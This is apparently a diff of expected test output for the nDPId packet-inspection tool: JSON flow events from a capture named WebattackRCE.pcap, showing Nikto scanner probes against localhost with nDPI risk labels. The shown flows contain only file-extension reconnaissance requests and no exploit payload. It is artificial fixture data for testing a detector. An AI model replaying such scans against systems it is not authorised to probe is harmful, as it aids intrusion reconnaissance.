{"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1576420276673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276673,"pkt":"AAAAAAAAAAAAAAAACABFAADOZZhAAEAG1o9\/AAABfwAAAcGaH5DBdl2HfBCdbYAYAED+wgAAAQEICp1m+umdZvrpR0VUIC8waFhDNlpVRS5CQm9hcmRTZXJ2bGV0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1576420276675,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276675,"pkt":"AAAAAAAAAAAAAAAACABFAADE9v9AAEAGRTJ\/AAABfwAAAcGcH5BsDc7u0ozjzoAYAED+uAAAAQEICp1m+uqdZvrqR0VUIC8waFhDNlpVRS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1576420276676,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276676,"pkt":"AAAAAAAAAAAAAAAACABFAADHEPBAAEAGKz9\/AAABfwAAAcGeH5DFGykA4SBK+YAYAED+uwAAAQEICp1m+uydZvrsR0VUIC8waFhDNlpVRS4xMDoxMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1576420276677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276677,"pkt":"AAAAAAAAAAAAAAAACABFAADECABAAEAGNDJ\/AAABfwAAAcGgH5BVFT\/w+l\/OFYAYAED+uAAAAQEICp1m+u2dZvrtR0VUIC8waFhDNlpVRS5leGUgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1576420276678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276678,"pkt":"AAAAAAAAAAAAAAAACABFAADFtjJAAEAGhf5\/AAABfwAAAcGiH5AIK44ii9cP6IAYAED+uQAAAQEICp1m+u6dZvruR0VUIC8waFhDNlpVRS5waHAzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1576420276679,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276679,"pkt":"AAAAAAAAAAAAAAAACABFAADEHFNAAEAGH99\/AAABfwAAAcGkH5DblSRB+hg5GYAYAED+uAAAAQEICp1m+u+dZvrvR0VUIC8waFhDNlpVRS5iYXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.bat","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.bat","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1576420276680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276680,"pkt":"AAAAAAAAAAAAAAAACABFAADBM9JAAEAGCGN\/AAABfwAAAcGmH5Br4QvDZx90z4AYAED+tQAAAQEICp1m+vCdZvrwR0VUIC8waFhDNlpVRS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
